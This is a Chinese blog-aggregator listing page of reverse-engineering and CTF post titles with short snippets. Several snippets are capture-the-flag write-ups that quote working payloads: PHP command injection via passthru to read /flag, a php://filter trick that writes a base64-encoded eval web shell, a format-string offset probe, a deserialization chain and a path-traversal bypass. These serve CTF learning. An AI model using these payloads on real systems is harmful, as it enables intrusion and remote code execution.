ctf逆向

预售第五十一天

其实很多情况下在不知道的时候只有经历过了才懂,就像以前老师说的,只有错过才知道什么是对,今天学习的是不要老是学习别人是怎么成功的,而是要探查一下别人是怎么失败的,因为失败是成功之母,是一种逆向思维呀!
李婷_c35b·2024-01-18 15:46

渗透测试之逆向使用IDA pro软件修改.exe小程序打开对话框显示的文字

环境:Win10专业版IDAproVersion7.5.201028.exe小程序问题描述:IDApro软件如何修改.exe小程序打开对话框显示的文字?解决方案:一、在IDAPython脚本中编写代码来修改.rdata段中的静态字符串可以使用以下示例代码作为起点(未成功)importidc#定义要修改的字符串地址string_address=0x12345678#请替换为实际的字符串地址new_s
玩电脑的辣条哥·2024-01-18 15:42

探索设计模式的魅力:抽象工厂模式的艺术

抽象工厂模式(AbstractFactoryPattern)是一种创建型设计模式,用于在不指定具体类的情况下创建一系列相关或相互依赖的对象。
danci_·2024-01-18 14:05

Mybatis逆向工程中出现Exception getting JDBC Driver的解决方法

在pom.xml中如下位置添加一个mysql-connector-java依赖即可mysqlmysql-connector-java5.1.28runtimeimage.png
MACPRO_徐·2024-01-18 14:08

008-基础入门-算法分析&传输加密&数据格式&密文存储&代码混淆&逆向保护护

008-基础入门-算法分析&传输加密&数据格式&密文存储&代码混淆&逆向保护护演示案例:➢传输数据-编码型&加密型等➢传输格式-常规&JSON&XML等➢密码存储-Web&系统&三方应用➢代码混淆-源代码加密
wusuowei2986·2024-01-18 14:00

Redis内部数据结构Dict结构详解

目录dict的数据结构定义dict的创建(dictCreate)dict的查找(dictFind)dict的插入(dictAdd和dictReplace)dict的删除(dictDelete)如果你使用过
码农小旋风·2024-01-18 14:16

新书速览|二进制安全基础

详解C语言反汇编技术、二进制漏洞挖掘和软件逆向分析方法。配套示例源码、PPT课件、教学大纲、教案、习题答案、作者QQ群答疑。
全栈开发圈·2024-01-18 13:35

爬虫逆向开发教程1-介绍,入门案例

爬虫前景在互联网的世界里,数据就是新时代的“黄金”。而爬虫,就是帮助我们淘金的“工具”。随着互联网的不断发展,数据量呈现指数级的增长,在数据为王的时代,有效的挖掘数据和利用,你会得到更多东西。学完爬虫你可以从事爬虫开发的工作,一个3-5年的爬虫工程师可以拿20k以上。相比Java,爬虫竞争少,好就业。同时你也可以做爬虫兼职,每月能挣个大几千。接下来我们正是学习爬虫。什么是爬虫?爬虫,顾名思义,就是
程序员丶Johnny·2024-01-18 11:37

逆向使用webpack打包的网站

webpackwebpack是JavaScript应用程序的模块打包器,可以把开发中的所有资源(图片、js文件、css文件等)都看成模块,通过loader(加载器)和plugins(插件)对资源进行处理,打包成符合生产环境部署的前端资源。所有的资源都是通过JavaScript渲染出来的。!function(e){varc={}functionn(t){vara=c[t]={i:t,//要加载模块的
joker_zsl·2024-01-18 11:43

保姆级反爬教学,JS逆向实现字体反爬

大家好,我是查理~网站的反爬措施有很多,例如:js反爬、ip反爬、css反爬、字体反爬、验证码反爬、滑动点击类验证反爬等等,今天我们通过爬取某招聘来实战学习字体反爬。字体反爬字体反爬:一种常见的反爬技术,是网页与前端字体文件配合完成的反爬策略,最早使用字体反爬技术的有58同城、汽车之家等等,现在很多主流的网站或APP也使用字体反爬技术为自身的网站或APP增加一种反爬措施。字体反爬原理:通过自定义的
查理不是猹·2024-01-18 11:22

如何从gitee上拉取代码到idea并修改提交

2.打开IntelliJIDEA,点击左上角的"File"菜单,选择"New"->"ProjectfromVersionControl"。
垫脚摸太阳·2024-01-18 10:03

iOS开发逆向之应用签名!

本文主要讲解什么是代码签名,以及iOS中的应用签名代码签名代码签名是对可执行文件或脚本进行数字签名.用来确认软件在签名后未被修改或损坏的措施。和数字签名原理一样,只不过签名的数据是代码而已.目的:防止可执行文件或脚本被篡改简单的代码签名在iOS出来之前,以前的主流操作系统(Mac/Windows)软件随便从哪里下载都能运行,系统安全存在隐患,盗版软件,病毒入侵,静默安装等等.那么苹果希望解决这样的
iOS鑫·2024-01-18 09:08

ssm整合

多线程共享时对象要实现序列化Serializable二级缓存cacheEabled这是官方文档里面关于二级缓存默认是开启的,而在我们使用的时候还是需要手动配置开启的MyBatis逆向工程插件1.导入jar
良月廿四212·2024-01-18 09:00

小程序基础学习(页面跳转传参)

目录正向传参原理:直接在url里面拼接参数即可接受参数编辑已经跳转到的页面用onLoad函数来接受即可然后写回页面展示即可逆向传参原理:通过使用getCurrentPages()这个方法来获取返回页面列表
冯运山·2024-01-18 08:52

【JS逆向学习】房天下登陆案例

逆向目标接口:https://passport.fang.com/loginwithpwdStrong.api加密参数:pwdGt、Chanllenge、Validate:都是滑块轨迹加密参数,本章不做分析逆向过程通过分析网络请求
诗雅颂·2024-01-18 08:39

Power Designer 连接 PostgreSQL 逆向工程生成pd表结构操作步骤以及过程中出现的问题解决

一、使用PowerDesigner16.5链接pg数据库1.1、启动PD.选择CreateModel…。1.2、选择Modeltypes/PhysicalDataModelPhysicalDiagram:选择pgsql直接【ok】1.3、选择connect在工具栏选择Database-Connect…快捷键:ctrl+shift+N.如下图:1.4、选择配置连接configure在弹出的窗口选择C
飞天小栗旬·2024-01-18 08:34

思考力:高效的系统思维

自上而下使用框架的四个步骤:步骤一:选择框架步骤二:分析问题步骤三:多维思考逆向思考,换位思考,零基思考步骤四:检查框架第四节——讲的是综合运用两种建构建框架方法。
candy_华·2024-01-18 08:35

[go] 抽象工厂模式

抽象工厂(AbstractFactory)接口声
ldxxxxll·2024-01-18 07:20

彻底解决charles抓包https乱码的问题

最近做js逆向,听说charles比浏览器抓包更好用,结果发现全是乱码,根本没法用。然后查询网上水文:全部都是装证书,根本没用!
kingtopest·2024-01-18 07:17

开发如果没有提供接口文档怎么办

2.逆向工程:如果可能的话,您可以通过观察应用程序的前端或其他组件的代码来尝试了解如何构建请求。这可能会揭示一些API端点、参数或头信息。3.抓包
代码小念·2024-01-18 03:51

逆向工程之class-dump的使用

class-dump-H解压完成的APP的文件路径/mexue2.app-o/Users/morris/Desktop/指定生成文件路径
MMD_·2024-01-18 03:48

centos7 安装mysql 出现 libnuma.so.1 问题解决

使用tar包安装mysql时出现:errorwhileloadingsharedlibraries:libaio.so.1:cannotopensharedobjectfile:Nosuchfileordirectoryerrorwhileloadingsharedlibraries
GitHub质检员·2024-01-18 03:35

XCTF-Misc1 pcap1 misc2-1

pcap1附件是一个xxxxx.pcap流量包分析1.流量包筛选统计协议分级,发现主要是TCP协议查看TCP协议的流量包,筛选关键词tcpcontainsflag跟踪TCP流,发现是python代码,将其导出2.导出的代码分析导出的代码,是对字符串进行自定义的base64、rot13、凯撒加密importstringimportrandomfrombase64importb64encode,b64
777sea·2024-01-18 02:56

XCTF-Misc1 Let_god_knows

Let_god_knows题目描述附件是一张图片Let_god_knows.bmp分析binwalk查看了没有隐藏文件,stegsolve查看通道,第一遍完全没有找到什么不同,LSB隐写我看了一下,实在是没找到突破口,只好去搜一下。然后就蛮无语的,在red通道0里面居然藏了一个二维码这个二维码太小了,哪怕截图,都不容易扫描,而且周边的黑白也会影响二维码的扫描。没办法,找到了题目的解题脚本:参考链接
777sea·2024-01-18 02:56

从零开始做题:逆向wdb_2018_2nd_easyfmt

1.题目信息2.解题分析格式化字符串漏洞如何确定偏移Doyouknowrepeater?输入AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.输出AAAA.0xffffd658.0x64.0xf7ffdc08.0xf7ffcd00.0xffffd77c.0x41414141.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x
网络安全我来了·2024-01-18 02:12

从零开始配置pwn环境:优化pwn虚拟机配置支持libc等指令

之前发现pwn虚拟机从零开始配置pwn环境:CTFPWN做题环境-CSDN博客无libc,magic等指令,后来查资料发现是没有安装Pwngdb,按如下处理解决该问题1.在pwn虚机上安装Pwngdbcd
网络安全我来了·2024-01-18 02:12

SWPUCTF 2022 新生赛-WEB部分wp

目录ez_ez_phpez_ez_php(revenge)奇妙的MD51z_unserializenumgamewhere_am_iez_ez_unserializejs_signxffwebdog1__startez_sqlfunny_phpfunny_webez_1zpopEz_uploadfile_masterPower!ez_ez_php源代码:即'or'66�]��!r,��b用途:se
orzw·2024-01-18 02:36

[SWPUCTF 2022 新生赛]numgame&奇妙的MD5

[SWPUCTF2022新生赛]numgame打开是一个永远到不了20的计算界面接着f12查看网页源代码发现打不开使用开发者工具看看能不能打开发现里边有一个前往网页的标签打开发现是一个js的代码这个地方有一串
ksks76·2024-01-18 02:06

[SWPUCTF 2022 新生赛]1z_unserialize和[SWPUCTF 2022 新生赛]ez_1zpo

[SWPUCTF2022新生赛]1z_unserialize这个题目是一题很标准的反序列化,$a=$this->lt;$a($this->lly);这是这一题的注入点只要传参把$a变成system();
ksks76·2024-01-18 02:06

[SWPUCTF 2022 新生赛]奇妙的MD5

[SWPUCTF2022新生赛]奇妙的MD5wp题目页面:提示:可曾听过ctf中一个奇妙的字符串。
妙尽璇机·2024-01-18 02:34

王东伟,中原焦点秦皇岛站第五期,每日分享第101天 2021.3.16

奇迹问句是从结局倒至开头的逆向操作原则的代表。使用奇迹问句的合适的时机:通常是在当事人已有一些能量或对未来怀有一丝希望的时候才会使用奇迹问句。
Vivian_c8c7·2024-01-18 00:14

幸福逆向行驶(14)

第二部妈妈094他也开始重新找工作了。他选定了当地最大的房地产企业做为目标。去应聘时,对方看了他的简历,表示很为难,说他的条件都不错,只是学历低,而且专业不对口。那时单位招工基本都要大学本科的学历了。所以说他只能从最底层做起。因为公司大,规矩多,而且人才济济,不能破格任用,从无先例。开出的待遇更是让人欲哭无泪。新入职的员工,新手期一年,每月只有一千七百块钱的工资。第二年才能拿到正式员工最低档工资。
鄂佛歌·2024-01-18 00:10

polar CTF 简单rce

一、题目nonono二、解题1、知识passthru()只调用命令,把命令的运行结果原样地直接输出到标准输出设备上。(替换system)payloadget?sys=passthru('ls%09/');postyyds=666payloadget?sys=passthru('sort%09/flag');postyyds=666
samRsa·2024-01-17 23:46

polar CTF CB链

一、题目二、解答(正常套路,这道题解不出,快速向下面看)1、通过jar包,可以看到/user路由下有反序列化操作看到存在commons-beanutils依赖且版本为1.9.2,可利用CB链Getshell。使用ysoserial项目中的CommonsBeanutils1链写一个POC,注意确保ysoserial项目中的pom.xml中的commons-beanutils与题目一致;ysoseri
samRsa·2024-01-17 23:46

polar CTF 写shell

一、题目二、解题payload?filename=php://filter/convert.base64-decode/resource=shell.php#content=aPD89QGV2YWwoJF9QT1NUWzFdKTs/Pg==然后访问/shell.php发现木马被读入,用蚁剑连接
samRsa·2024-01-17 23:42

[SWPUCTF 2022 新生赛]1z_unserialize

[SWPUCTF2022新生赛]1z_unserializewp题目代码:lt;$a($this->lly);}}unserialize($_POST['nss']);highlight_file(__
妙尽璇机·2024-01-17 23:06

[HNCTF 2022 Week1]What is Web

flag在源码里<!是HTML文档的注释格式,在源码里按Ctrl+F搜索<!能帮你更快地找到提示。将这个字符串base64解码得到flag:
妙尽璇机·2024-01-17 23:06

[NSSCTF Round#16 Basic]了解过PHP特性吗

了解过PHP特性吗wp第一页题目代码:114514&&strlen($_114)9999999){$checker_3=TRUE;}}$arr4y=$_POST['arr4y'];if(is_array($arr4y)){for($i=0;$i114514&&strlen($_114)9999999){$checker_3=TRUE;}}114用科学记数法传入即可,514可以用数字+字母,数字+%
妙尽璇机·2024-01-17 23:06

[NSSCTF Round #8]——web专项赛wp

MyDoor上来什么也没有,用php伪协议读取index.php中的内容,构造payload:http://node2.anna.nssctf.cn:28803/index.php?
Leafzzz__·2024-01-17 23:05

[NSSCTF Round#16 Basic]RCE但是没有完全RCE

RCE但是没有完全RCEwp题目代码:第一关
妙尽璇机·2024-01-17 23:35

Android马甲包开发

build.gradle中一些相关配置2.AndroidManifest.xml中的一些相关配置(${}的使用)3.不同马甲包存放路径4.签名文件路径配置1.build.gradle中一些相关配置productFlavor
好运常伴amin·2024-01-17 23:35

React全局状态管理

index.jsimportReactfrom'react'importReactDOMfrom'react-dom'impo
卡卡舅舅·2024-01-17 21:33

陈湛匀:民营企业如何正确进行买壳上市?

买壳上市又称“后门上市”或“逆向收购”,是指非上市公司购买一家上市公司一定比例的股权来取得上市的地位,然后注入自己有关业务及资产,实现间接上市的目的。一般而言,买壳上市是民营企业的较佳选择。
小恶魔_f4fa·2024-01-17 20:09

[buu - web]HCTF2018 WarmUp

HCTF2018WarmUp"source.php","hint"=>"hint.php"];if(!isset($page)||!
菜菜zhao·2024-01-17 20:00

[HCTF 2018] WarmUp

[HCTF2018]WarmUp开局一张图,先看看页面源码信息给出了一个source.php应该是后端的源码,这题代码审计了"source.php","hint"=>"hint.php"];#这是定义了一个白名单
iKnsec·2024-01-17 20:28

[HCTF 2018]WarmUp1解题思路

1.看题如下,得到一张滑稽表情2.老方法F12先看网页源码,得到注释提示3.访问hint.php,得到一串提示信息flagnothere,andflaginffffllllaaaagggg现在构造获取flag的语句hint.php?../…/…/…/…/ffffllllaaaagggg我们可以想象他传入checkFile函数要经历第一次白名单验证一次?过滤后他就是hint.php再进行一次白名单验
旺仔Sec·2024-01-17 20:28

BUUCTF [HCTF 2018]WarmUp

打开环境是一个滑稽查看源代码,提示source.php打开source.php是php代码"source.php","hint"=>"hint.php"];if(!isset($page)||!is_string($page)){echo"youcan'tseeit";returnfalse;}#检查变量page里是否有source.php或者hint.phpif(in_array($page,$
白塔河冲浪手·2024-01-17 19:57

【BUUCTF】 HCTF2018 WarmUp

这是一道有关php代码审计的入门题目,进入所给链接后看到的是一张滑稽的表情包按照常规思路f12,看一看有什么,结果发现了一个名为source.php的注释访问这个php页面,发现有一段代码代码先定义了一个checkFile函数,然后主函数在下大致意思是,只有链接中包含了file文件请求且通过了checkFile函数的验证,那么将把链接包含的file文件include到页面中,否则输出一张图片(推测
90wunch·2024-01-17 19:57

[HCTF 2018]WarmUp1

建议复制到自己vscode里观看本来今天想在宿舍躺捏,后来想想还是来gxg把这篇writeup补完吧--------------------------------------------------这是buuctf
我小皮超勇的·2024-01-17 19:27

一、[HCTF 2018]WarmUp

1.第一步看源码2.看source.php观察源码逻辑,首先可以发现白名单是只有source.php和hint.php,通过访问hint.php我们可以知道flag在ffffllllaaaagggg文件中但很明显我们无法直接访问,所以当然是继续分析逻辑3.审计source.php文件if(!empty(REQUEST[′file′])//_REQUEST['file'])//REQUEST[′fi
囍语儿·2024-01-17 19:57
上一页 29 30 31 32 33 34 35 36 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他